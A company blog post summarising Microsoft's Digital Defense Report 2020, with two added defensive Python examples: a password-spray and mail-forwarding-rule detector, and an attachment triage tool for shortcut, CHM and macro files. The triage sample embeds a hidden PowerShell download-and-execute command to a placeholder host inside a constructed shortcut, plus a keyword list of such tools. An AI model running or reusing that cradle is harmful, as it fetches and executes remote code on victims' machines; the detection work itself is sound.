Security has become a major focus in 2021 as many organisations adopt a hybrid work environment. Microsoft recently released its Digital Defense Report, and we asked our resident security guru Danny to write an overview of it to save you some reading. Below are his thoughts, along with a video that explains more.
Did you know that Microsoft has been producing security intelligence reports since 2005? Unfortunately, the latest report uses the word "unprecedented" in its first sentence... but that's OK, because it is true.
I just don’t like to be reminded of a lot about 2020.
Mark Anderson, National Security Officer at Microsoft, gave a great 40-minute summary of the report. I'd recommend watching it if you have the time.
It's still staggering how much data Microsoft analyzes across what I think they are still calling their 'Intelligent Security Graph'... but when you consider a company of that size, even its internal systems alone generate a huge amount of data to analyze. The often-quoted figure of 8 trillion signals a day works out to roughly 93 million per second.
There is a great graphic in the report that illustrates some of what makes up that number.
The report covers 'the state of cybercrime', 'nation state threats' and 'security and the remote workforce'.
What's also great about the report is that it provides best practices and actionable learnings, rather than being a purely informative piece that leaves you wondering, "what do I do?"
Not surprisingly, phishing features prominently, in three main forms: credential phishing, business email compromise (BEC) and a combination of the two. This is consistent with attackers shifting from malware to phishing because it offers a better return on investment.
Microsoft has also published the top five spoofed brands and the industries most targeted by BEC, along with a "prevention checklist" that gives some useful direction.
Malware, and ransomware in particular, is called out in the report with some frightening statistics and, more importantly, the steps to take to reduce the risk from the techniques most commonly used to gain initial access and spread ransomware.
IoT devices also get a good summary of findings, key insights and a more thorough list of recommendations. IoT is an often-overlooked area of security, so it is good to see Microsoft giving it attention in the report. Supply chain security, including third-party and open-source software, also gets coverage and recommendations.
All of that and more just in the first ‘state of cybercrime’ section!
Moving into nation state threats, Microsoft outlines examples of nation state actors and their activities, Microsoft's approach to them and lists of targets. The common operational aims are also identified, primarily espionage, disruption or destruction.
Not surprisingly, password spray attacks are increasingly used for reconnaissance, not only against corporate accounts but also against personal accounts, where people may not have strong passwords or MFA enabled, making them valuable targets for surveillance. Credential harvesting through spear-phishing email, imitation domains and spoofed login pages is also highlighted, with examples of how these were combined with email forwarding rules to keep collecting a victim's mail even after a password change.
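Two quick checks for the techniques just described, written as an added example for this post rather than taken from the report or from Microsoft: a low-and-slow password spray shows up in sign-in logs as one source IP failing against many accounts a couple of times each, which per-account lockout never catches, and a forwarding rule planted in a mailbox survives a password reset, so it is worth auditing every rule that sends mail outside the organisation. The sign-in events, inbox rules and the example.com domain below are all constructed for this example; the field names are loosely modelled on Azure AD sign-in logs and Exchange inbox rules but are not a real export.

```python
import json
from collections import defaultdict

# Assumption for this example: the organisation's own mail domains.
INTERNAL_DOMAINS = {"example.com"}

# Constructed sign-in events as JSON lines (not a real export).
# 203.0.113.10 tries six accounts once each and gets one hit;
# 198.51.100.7 is a user mistyping their own password.
SIGNIN_LOG = """\
{"time":"2020-09-01T08:00:01Z","user":"alice@example.com","ip":"203.0.113.10","result":"failure"}
{"time":"2020-09-01T08:00:09Z","user":"bob@example.com","ip":"203.0.113.10","result":"failure"}
{"time":"2020-09-01T08:00:17Z","user":"carol@example.com","ip":"203.0.113.10","result":"failure"}
{"time":"2020-09-01T08:00:25Z","user":"dave@example.com","ip":"203.0.113.10","result":"failure"}
{"time":"2020-09-01T08:00:33Z","user":"erin@example.com","ip":"203.0.113.10","result":"success"}
{"time":"2020-09-01T08:00:41Z","user":"frank@example.com","ip":"203.0.113.10","result":"failure"}
{"time":"2020-09-01T08:02:00Z","user":"alice@example.com","ip":"198.51.100.7","result":"failure"}
{"time":"2020-09-01T08:02:05Z","user":"alice@example.com","ip":"198.51.100.7","result":"failure"}
{"time":"2020-09-01T08:02:20Z","user":"alice@example.com","ip":"198.51.100.7","result":"success"}
"""

# Constructed inbox rules shaped like the fields you would pull from a
# mailbox rule export (not real data).
INBOX_RULES = [
    {"mailbox": "erin@example.com", "name": "..",
     "forward_to": ["collector@mail.example.net"], "delete_message": True},
    {"mailbox": "bob@example.com", "name": "Team digest",
     "forward_to": ["team@example.com"], "delete_message": False},
    {"mailbox": "carol@example.com", "name": "Personal copy",
     "forward_to": ["carol.home@example.org"], "delete_message": False},
]


def detect_password_spray(log_text, min_accounts=5, max_failures_per_account=2):
    """Group sign-ins by source IP and flag IPs that touch many distinct
    accounts with only a few failures each. Returns one finding per IP,
    including any account the IP actually got into."""
    by_ip = defaultdict(lambda: {"failed": defaultdict(int), "succeeded": set()})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        bucket = by_ip[ev["ip"]]
        if ev["result"] == "failure":
            bucket["failed"][ev["user"]] += 1
        elif ev["result"] == "success":
            bucket["succeeded"].add(ev["user"])

    findings = []
    for ip, bucket in by_ip.items():
        accounts_tried = set(bucket["failed"]) | bucket["succeeded"]
        if len(accounts_tried) < min_accounts:
            continue  # a few typos on one account is not a spray
        if max(bucket["failed"].values(), default=0) > max_failures_per_account:
            continue  # hammering one account is brute force, a different alert
        findings.append({
            "ip": ip,
            "accounts_tried": len(accounts_tried),
            # A success from a spraying IP means a password was guessed.
            "compromised": sorted(bucket["succeeded"]),
        })
    return findings


def audit_forwarding_rules(rules, internal_domains=INTERNAL_DOMAINS):
    """Flag rules that forward mail outside the organisation. A rule that also
    deletes the original, or whose name is blank or punctuation only, is
    rated high: both are heuristics for a rule meant to go unnoticed."""
    findings = []
    for rule in rules:
        external = [addr for addr in rule["forward_to"]
                    if addr.rsplit("@", 1)[-1].lower() not in internal_domains]
        if not external:
            continue
        hidden = rule["delete_message"] or rule["name"].strip(" .") == ""
        findings.append({"mailbox": rule["mailbox"], "rule": rule["name"],
                         "external": external,
                         "severity": "high" if hidden else "medium"})
    return findings


if __name__ == "__main__":
    for f in detect_password_spray(SIGNIN_LOG):
        print("spray from %(ip)s: %(accounts_tried)d accounts, got in as %(compromised)s" % f)
    for f in audit_forwarding_rules(INBOX_RULES):
        print("%(severity)s: %(mailbox)s rule %(rule)r forwards to %(external)s" % f)
```

Run against the constructed data, the spray detector names 203.0.113.10 and reports erin@example.com as the guessed account, while the legitimate retries from 198.51.100.7 are ignored. The rule audit flags erin's ".." rule as high (external destination plus delete) and carol's personal copy as medium; a rule like that is exactly what lets an attacker keep reading mail after the password is reset, so resetting credentials without reviewing rules leaves the hole open.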
Malware is also mentioned as one of the most effective and commonly used methods to gain a foothold and maintain persistence. Examples given include shortcut (.lnk) files with hidden payloads, Windows compiled HTML Help (.chm) files and PowerPoint and Word macros.
And finally, given the year we've just had, VPN vulnerabilities were also targeted, reflecting the increased reliance on remote access.
The third section of the report focuses on "Security and the Remote Workforce". It highlights how differently a lot of people were forced to work, and the shift away from the castle-and-moat model we have used in the past, where security effort went into protecting the network perimeter.
A good explanation of the Zero Trust security model is given; it is well worth a read to understand Microsoft's approach and, if you haven't already, to start thinking about the value this model provides.
Device and patch management (for obvious and important reasons!) and attacks on infrastructure (DDoS) are also covered, including tactics such as using a DDoS attack as a diversion: security teams are drawn to what looks like a high-impact attack while a 'quieter' attack takes place against backend systems.
Identity-based attacks and information rights management are covered, with a good summary of insider threats and insider risk management.
An interesting section on enterprise resilience is also included, highlighting the human element of resilience in a year of such significant change.
In the last section, "Actionable Learnings", we are given a list of steps to take. I'll quote this because I think it's written really well...
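The three delivery methods mentioned above can all be recognised by content rather than by file extension, which matters because a shortcut or help file is often disguised as a document. The following attachment triage is an added example for this post (not code from the report or from Microsoft): it reads the shortcut's command-line arguments using the StringData layout from the published MS-SHLLINK format, recognises a compiled HTML Help file by its ITSF signature, and looks inside an OOXML package for a vbaProject.bin part. The sample shortcut and document are constructed in memory, the keyword list is an assumption, and the URL in the sample is a placeholder; nothing here is real malware.

```python
import io
import struct
import zipfile

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
CHM_MAGIC = b"ITSF"
OLE2_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")

# LinkFlags bits from MS-SHLLINK needed to walk to the StringData section.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData fields appear in this fixed order, each present only if its flag is set.
STRING_DATA = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
               (0x20, "arguments"), (0x40, "icon_location"))

# Assumption: tokens that make shortcut arguments worth a closer look.
SUSPICIOUS_ARGS = ("powershell", "cmd.exe", "/c ", "mshta", "wscript", "cscript",
                   "rundll32", "regsvr32", "certutil", "-enc", "-w hidden",
                   "downloadstring", "iex ")


def parse_lnk(data):
    """Return the StringData fields of a Windows shortcut, or None if the bytes
    are not a shortcut. The arguments field is where a 'hidden payload'
    shortcut carries the command it really runs."""
    if len(data) < 76 or data[:4] != b"L\x00\x00\x00" or data[4:20] != LNK_CLSID:
        return None
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76  # fixed-size ShellLinkHeader
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]  # IDListSize + IDList
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]  # LinkInfoSize includes itself
    fields = {}
    for bit, key in STRING_DATA:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + width * count]
            fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += width * count
    return fields


def triage(filename, data):
    """Classify an attachment by its content and list reasons it is suspicious.
    Returns (kind, reasons)."""
    reasons = []
    lnk = parse_lnk(data)
    if lnk is not None:
        args = lnk.get("arguments", "")
        hits = [tok for tok in SUSPICIOUS_ARGS if tok in args.lower()]
        if not filename.lower().endswith(".lnk"):
            reasons.append("shortcut disguised with a different extension")
        if hits:
            reasons.append("shortcut arguments invoke " + ", ".join(hits))
        if len(args) > 200:
            reasons.append("unusually long arguments (%d chars)" % len(args))
        return "lnk", reasons
    if data.startswith(CHM_MAGIC):
        reasons.append("compiled HTML Help file: can run script when opened")
        return "chm", reasons
    if data.startswith(OLE2_MAGIC):
        reasons.append("legacy binary Office file: inspect for VBA with a dedicated tool")
        return "ole2", reasons
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
        if any(n.lower().endswith("vbaproject.bin") for n in names):
            reasons.append("OOXML document contains a VBA project (macros)")
            if filename.lower().endswith((".docx", ".pptx", ".xlsx")):
                reasons.append("macro-free extension but macros present")
        return ("ooxml" if "[Content_Types].xml" in names else "zip"), reasons
    return "other", reasons


def build_sample_lnk():
    """Construct a minimal shortcut targeting cmd.exe whose arguments start a
    hidden PowerShell download cradle (placeholder URL, constructed sample)."""
    flags = 0x08 | 0x20 | IS_UNICODE  # HasRelativePath | HasArguments | IsUnicode
    header = b"L\x00\x00\x00" + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (76 - len(header))  # remaining header fields zeroed
    def string_data(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    args = ("/c powershell -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
            ".DownloadString('http://example.invalid/p')\"")
    return header + string_data(r"..\..\Windows\System32\cmd.exe") + string_data(args)


def build_sample_docm():
    """Construct an in-memory OOXML package that carries a VBA project."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\x00" * 16)
    return buf.getvalue()


if __name__ == "__main__":
    samples = [("Invoice_2020.pdf.lnk", build_sample_lnk()),
               ("manual.chm", CHM_MAGIC + b"\x00" * 60),
               ("report.docm", build_sample_docm()),
               ("notes.txt", b"plain text")]
    for name, blob in samples:
        print(name, *triage(name, blob))
```

The shortcut parser only walks the header, the optional ID list and LinkInfo blocks, and the string fields, which is enough to pull out the command line a user never sees behind the icon. For the legacy binary Office format the script only reports that it is OLE2; parsing VBA streams is a job for a dedicated tool, and the OOXML check stops at the presence of a VBA project rather than reading the macro source.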
“…we recommend organizations take a proactive approach to shoring up their security and resiliency by using the following controls.
While all these learnings are valid and beneficial recommendations for a cybersecurity program, we’ve selected our most salient points for each chapter and mapped them with icons as shown below.”
The first of these, not surprisingly, is 'Adopt MFA'!
My advice is to start with the summary from Mark Anderson, then download the report and focus on the areas of deeper interest and relevance to you: Microsoft Digital Defense Report 2020: Cyber Threat Sophistication on the Rise – Microsoft Security
If your organisation needs a security upgrade, reach out below to speak to our experts.